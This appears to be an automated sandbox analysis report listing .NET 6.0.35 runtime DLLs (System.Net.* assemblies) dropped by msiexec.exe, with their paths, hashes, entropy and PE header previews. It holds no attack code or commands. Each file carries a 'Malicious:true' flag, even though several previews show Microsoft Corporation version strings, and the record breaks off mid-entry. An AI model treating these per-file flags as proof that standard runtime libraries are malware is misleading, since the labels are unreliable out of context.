                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:yS1PRHHY1TVcdoU0ZMg4m5IL2SvKBpKY37PWWDczF:yg5HHYVdd48ILepK86/B
                                                                                                                                                                                                                                                                                                                                  MD5:9BAAB57800A8916FC5F8A34ABD4369A5
                                                                                                                                                                                                                                                                                                                                  SHA1:9C9B2A43F51929E676DF7946BB67C3F6DC9AA541
                                                                                                                                                                                                                                                                                                                                  SHA-256:6AEB6CE1FE5C3A96845DD577F40D556CC3B88E23518396B14004EBCAA99455AB
                                                                                                                                                                                                                                                                                                                                  SHA-512:0FEF94A0C557740E0B538F103039A5A3E8007A6C150C88BAAA1552A5D77F1D68F61A876489F496139F001C1897DCC6A5677DA2BF55B2EF3BB42CE644497C2840
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Q............" .........................................................0............`...@......@............... .......................................,..D....... )... ......@...T...............................................................H............text............................... ..`.data...............................@....reloc....... ......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.692866532143802
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:vtjvFk4HiSLahyjGNbykDXO3bf5G+bHX7T1sWkN6OcE/64BWm1/2us/6M6eURoi5:FbFk4C5y4zOz53h+5fwR6eSo9kD
                                                                                                                                                                                                                                                                                                                                  MD5:D45721810B97663F99E10123DDFFEA4C
                                                                                                                                                                                                                                                                                                                                  SHA1:400FA1A9C317DCDAF5A6229B713B3803BB6879A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:1AA669D54F4BBA84C1833E4C6C7FCD6C5057412618604F48844BB79B9FE0AC72
                                                                                                                                                                                                                                                                                                                                  SHA-512:3932DDE0AB8EFF7A0A1DAACA9A6C0F29A17A6F55039F640AEBBEE61CBA07567FE756F5F6A6A787ADFBCBB268A73861F5FE51C177380C3B783D380883DD2F16E9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....>............" .........:...............................................@............`...@......@............... .................................. ...\V..<........)...0.. ....!..T........................................................... ...H............text............................... ..`.data....3.......4..................@....reloc.. ....0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):293640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.636078633076518
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:mvExTiARl6gq1zPt3CxPpuLdDmRw6WSL/l6eohgni:lR/j6XzBCxPpuLRm1l6Xmni
                                                                                                                                                                                                                                                                                                                                  MD5:FD789783FCE2564634EA2D47D4CF14CB
                                                                                                                                                                                                                                                                                                                                  SHA1:4C4C721EEB969A869625F64150759EA236DA1E7D
                                                                                                                                                                                                                                                                                                                                  SHA-256:7E5A21124CD63F428A24B78290569628F16C7C0D58BD4323CE358B235031AC98
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0C4F2072E239312ACBFA868E5A69957CBAF058A189DB1DC4B2DD2265396C69C6A5813B8A8FF1D18F7950A93D3AAD08B51AE58805E1E14891EE8BA873D528886
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........n.......................................................*....`...@......@............... ......................................xw..|....R...)...p......H&..T...............................................................H............text............................... ..`.data...Re.......f..................@....reloc.......p.......J..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):349456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.619249857259698
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:ymhqNLrajj/iS/9z3E8djsPOkdMA4f5G/eopZFBq1Y:y8YPafiUWXAr1Y
                                                                                                                                                                                                                                                                                                                                  MD5:646F04A2738C65F25D1934E497ACFBA7
                                                                                                                                                                                                                                                                                                                                  SHA1:19850A695DC06568C4B4766A2BDF4D0383A6A273
                                                                                                                                                                                                                                                                                                                                  SHA-256:68BD9418A0B1ECBFD4202F145D00C0D23BB40F1936964A2B7EEB979053B234FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:88664A6FE955AC149EF6C4E5DAE49D414BE01B7FDCC7BD3BF578B84BC84D63BCC6EB12BC53495C255E19A3977877C04DACFB2D5D078AAA4B2B0E9F0474383CC1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........p...............................................P......,.....`...@......@............... ..........................................*...,...)...@.......+..T...............................................................H............text.../........................... ..`.data....g.......h..................@....reloc.......@.......$..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):685320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8245378715729474
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:XiPF+HUmX2XIw9BaNGRjpgPzLoLLwCvUX3L/Z9q92OD:XiS7X2N9Bki8k
                                                                                                                                                                                                                                                                                                                                  MD5:CA07464D94CC02F114CDA16BD19CCF01
                                                                                                                                                                                                                                                                                                                                  SHA1:552B26F881040EF5622E4B8B728D9F964CAC7B99
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC1941E90A90CDE9F11CFCEF96B7618790EC321E760E4F3AFD53096DE7179484
                                                                                                                                                                                                                                                                                                                                  SHA-512:7BD77B75539065AA42F04A62928E22D3BF823026597398D8923BB9C12E034EF183E629D39A5C7324D17BF50B3064F5D009DDC2916B2C7EB9EAF3FEDD180DF5C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...;)............" .........................................................p............`...@......@............... ...........................................<...L...)...`..<...(-..T...............................................................H............text.............................. ..`.data...............................@....reloc..<....`.......@..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):37136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.50638514033971
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:NW+nFWGN7798x33dWc8fIY6WxR6OU1RpnJ87bxHKnfrjRYFSlxgdg3a2myQJNx9x:jTJyMBing5AD9wggDsKmqrFClA9zJ
                                                                                                                                                                                                                                                                                                                                  MD5:33F1488B82619B32EF30D8FA10932A83
                                                                                                                                                                                                                                                                                                                                  SHA1:073459116F208778B98A4B996984D6ABF742D820
                                                                                                                                                                                                                                                                                                                                  SHA-256:F91AFB1582BDD85D9B6CC6D4E5774169825E73E4BCD3A36C4408D37637731CC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:96DF7CBEB36BF3CBB460DD6F531CD30971DE904A55354F9B9ED3FD67A3B0DD7800EDD2400EBEB9A329AF707B0232BA280FBC6B9C5690AF5F391CA2CC26131672
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...$............." .....\..........................................................-i....`...@......@............... ..........................................`....h...)..........H...T...............................................................H............text...KZ.......\.................. ..`.data........p.......^..............@....reloc...............f..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...H.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...S.e.r.v.i.c.e.P.o.i.n.t...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...X.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):506632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.739877963601641
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:iY72vFk13eFkZMdvJEKzDiL1vu21pcIzL9wKopz+t+dR5jJ3B+P:iY72G13ZMliwiwOoZ+t+dRz34P
                                                                                                                                                                                                                                                                                                                                  MD5:B1C89B1E9A5D537A32BFC42710B590C6
                                                                                                                                                                                                                                                                                                                                  SHA1:0D0AEC1748EC4B8B50C23E82F6453908AE4F4F66
                                                                                                                                                                                                                                                                                                                                  SHA-256:E15AFD60ED6A5801F153648A77F36D15B7F9EDD1934CD342AAA3312D23E57FC1
                                                                                                                                                                                                                                                                                                                                  SHA-512:35E24F64F3D0A8FD171736C2503DC45931A9169C30BDFA450A741B0DD3E8E264B82508937CB52AFF31FFCCFE86DA4BB8FBFE38148748B3ED76F39B611D777F37
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...b2............" .........~............................................................`...@......@............... ...........................................6.......)..........p4..T...............................................................H............text............................... ..`.data....s...0...t..................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):166696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.64714001372041
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:5xwi2eI9dTW/NFVMqRcz7qu0OxDVY3qwJhlij3PMluseo1rzSH:rwi2eORW/3/RczOu0ghsegzS
                                                                                                                                                                                                                                                                                                                                  MD5:E66E573B815651533098204FE8F6A4B3
                                                                                                                                                                                                                                                                                                                                  SHA1:8A781D7E5C60F432BFB81FE4CBDCF1387E1B5711
                                                                                                                                                                                                                                                                                                                                  SHA-256:2AF045741EF32D6C92E345D75281B39EA818958C01ECB47834E43540901EBC83
                                                                                                                                                                                                                                                                                                                                  SHA-512:32247AAF0B7E71B365DD752A51C296C2EC3CB880A02106E4774616638E5ADEF16EEF163CB797076E9F891F612C4E38FD8039A3194C4533A07374DCF6B1477054
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...p............." ....."...>......................................................P.....`...@......@............... .......................................L..p....b..()......x...H...T...............................................................H............text.... .......".................. ..`.data....6...@...8...$..............@....reloc..x............\..............@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...B.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...R.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):60696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.535904077319764
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HBfRKv+6SDbVXWTlEG3VulTTTTTTTTTTTTTTTTTTTTTTTTT0NW8zOCb:HrKKpXqln3VRNrJb
                                                                                                                                                                                                                                                                                                                                  MD5:1A2192CD55AC26651019BD5716EDF274
                                                                                                                                                                                                                                                                                                                                  SHA1:9DDFCAAB954D4E86CFC9DA88E666AB57A19A0561
                                                                                                                                                                                                                                                                                                                                  SHA-256:2888BFDD67C2A71968E5945814471BFFC0A3BDE85980DF855CE3D60FE93C76E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:2E4ABC3F4FF57418B2C0DDDEFDFCFBC48AE6B4ED5AD6C28C4917C04DC447A52B3356FE5F478283930FCE7079D08742946844F7537EC5D9E90C7163CA99174922
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" ......................................................................`...@......@............... ......................................x"...........)..............T...............................................................H............text.............................. ..`.data...9...........................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.H.e.a.d.e.r.C.o.l.l.e.c.t.i.o.n.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebProxy.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.557487177148606
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:y3WpQwWm/k/viYHcZg2VUi6VGt1QWKlL/95/1oqOMlGFESX6HRN7PSpGR9z35v:yNyk/vL72Vd1HgTls3WPSY9zJv
                                                                                                                                                                                                                                                                                                                                  MD5:6EB91FC196B1CC9F19B2CD8FC3E8434A
                                                                                                                                                                                                                                                                                                                                  SHA1:AF03A2772C81E7CA43DE3297979F110BAAA6CFDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F91556DE372D206D3622027C4512398B58EC8859C376A7D144926E0E85E51DA
                                                                                                                                                                                                                                                                                                                                  SHA-512:2AA33D88632309BC64932A1E330072CDCD0D8C9952B7B9CB25F367EDF7AA11BD005C2299AF0E1D4E3005D75CDD2620688322F14ADD8B03A1B3A01FC454E8ED71
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .....H................................................................`...@......@............... ..................................t............T..8)...p..........T...........................................................x...H............text..._F.......H.................. ..`.data...i....`.......J..............@....reloc.......p.......R..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...@.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.P.r.o.x.y...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...P.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...N.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.Client.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76568
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4853478188512375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:67OYMIHH9XOUiSd13OETTzlw49YLOXC3zlc5rbIRWpqIWHVz9:8ln5zX33DTTzlp9YLNDlc5rMZIq5
                                                                                                                                                                                                                                                                                                                                  MD5:4F6B324C53BBB877F0F42A6EAB84179B
                                                                                                                                                                                                                                                                                                                                  SHA1:3E57D33C2292533D31CE0D5254C2225ADFB1F1ED
                                                                                                                                                                                                                                                                                                                                  SHA-256:83968FC6BDF453ED228B7DA140C248ADE2F7A6084978DB67205A97636664F11D
                                                                                                                                                                                                                                                                                                                                  SHA-512:284DE4790BADFB59A9CD378A4789219CBC4CBEAB299F8F126B167EDB77F9204CBFEC9EC4309743E414D6931B7FFC73D530C2253C609A68679115EEA3C9894BBC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!............." .........................................................0.......U....`...@......@............... ......................................8(...........)... ..........T...............................................................H............text...1........................... ..`.data...............................@....reloc....... ......................@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...R.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...N.e.t...W.e.b.S.o.c.k.e.t.s...C.l.i.e.n.t.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...b.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebSockets.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.640593125749875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:crJ1yGe/CWqtx3IRJK9Gkszawp+z1Mq87repROMKKnXWRDYZbQLmvh6st/9o1BV/:+yGtt+Rh887rijXXWrmvh3tu1O/ZRhmV
                                                                                                                                                                                                                                                                                                                                  MD5:C7159CD5889AACF32C60F1209B45B306
                                                                                                                                                                                                                                                                                                                                  SHA1:B21C82BC847D02C854BBF06B5F7DC6570EE95323
                                                                                                                                                                                                                                                                                                                                  SHA-256:30698ED152943072144CFFA5530C4D1F7A39C2AC0B9D4D982CA39CD9011FDF70
                                                                                                                                                                                                                                                                                                                                  SHA-512:3261D5EBB7D2240E9D901A4FF42E89F05A336BB4DF9AFC5063B79DEDEC705C7357DDADDB41B1C61FE9D91784C03163E10025CB63AF3EE0A38776A50AE9688F7E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....p..........." .....d...8......................................................c/....`...@......@............... .................................. ....O..`.......0)..........H...T........................................................... ...H............text....b.......d.................. ..`.data....3.......4...f..............@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.581798101266097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:pV6EWw138N8G2WowVaWTYA6VFHRN7u+TcTR9z6ZGa:pV6Er138x/FClBwV9z/a
                                                                                                                                                                                                                                                                                                                                  MD5:9E6ACD5E0685D1C4B169FFCC4A990B48
